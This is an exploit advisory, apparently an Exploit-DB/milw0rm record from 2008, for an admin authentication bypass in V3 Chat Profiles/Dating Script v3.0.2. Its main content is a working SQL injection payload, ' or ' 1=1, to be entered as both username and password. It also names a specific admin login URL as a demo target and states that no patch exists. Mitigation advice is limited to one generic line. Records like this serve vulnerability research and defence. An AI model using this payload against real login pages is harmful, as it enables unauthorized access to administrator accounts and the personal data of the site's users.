vendor: Profiles/Dating Script
by: d3b4g
CVSS: 7.5 HIGH
Authentication Bypass
CWE: N/A
Product Name: Profiles/Dating Script
Affected Version From: V3 Chat - Profiles/Dating Script v3.0.2
Affected Version To: V3 Chat - Profiles/Dating Script v3.0.2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

V3 Chat – Profiles/Dating Script v3.0.2 Auth Bypass Vulnerability

By submitting ' or ' 1=1 as the username and ' or ' 1=1 as the password, an attacker can bypass authentication in V3 Chat - Profiles/Dating Script v3.0.2.

Mitigation:

Ensure that authentication is properly implemented and that user input is properly sanitized.

Exploit-DB raw data:

[~] V3 Chat - Profiles/Dating Script v3.0.2 Auth Bypass Vulnerability
[~]
[~] -----------------------------------------------------------------
[~] Discovered By: d3b4g
[~]
[~] contact: bl4ckend[at]gmail[dot]com  
[~] 
[~] Risk: High

 ---------------------------------------------------------------------

Exploit: Use this information to bypass admin login

username: ' or ' 1=1

password: ' or ' 1=1
-----------------------------------------------------------------------

Demo: http://v3chat.com/v3profiles/admin/



[~]----------------------------------------------------------------------
[~] Greetz tO: All fu3k3rz

# milw0rm.com [2008-11-08]